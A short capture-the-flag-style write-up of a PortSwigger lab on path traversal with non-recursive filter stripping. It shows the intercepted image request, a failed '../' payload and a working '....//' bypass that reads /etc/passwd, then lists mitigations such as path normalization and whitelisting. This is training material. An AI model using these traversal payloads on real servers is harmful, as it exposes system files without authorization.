PortSwigger Lab: File path traversal, traversal sequences stripped non-recursively
Task
This lab contains a path traversal vulnerability in the display of product images.
The application strips path traversal sequences from the user-supplied filename before using it.
To solve the lab, retrieve the contents of the /etc/passwd file.
Attempt
Turned intercept on and opened a product image in a new tab.
Captured request:
GET /image?filename=75.jpg
Tried a simple payload:
../../../../etc/passwd
The page returned a "no such file" error.
Next I used a mangled path, one that still contains ../ after the filter has stripped each ../ sequence a single time:
....//....//....//....//etc/passwd
Worked like a charm.
Mitigation
Do not allow users to specify file names directly. Whitelist valid files or directories. Normalize file paths (e.g. realpath() in PHP) and verify that the normalized path still lies inside the intended directory before opening it.